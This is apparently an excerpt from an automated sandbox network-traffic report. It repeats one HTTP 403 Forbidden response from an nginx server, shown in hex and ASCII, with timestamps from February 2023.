            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:21 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:21 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:22 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:22 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:23 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:24 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:24 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:25 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:25 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:26 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:26 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:27 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:27 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:27 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:28 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:29 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:30 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:30 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:31 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:31 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:32 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:32 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:33 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:33 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:34 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:35 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
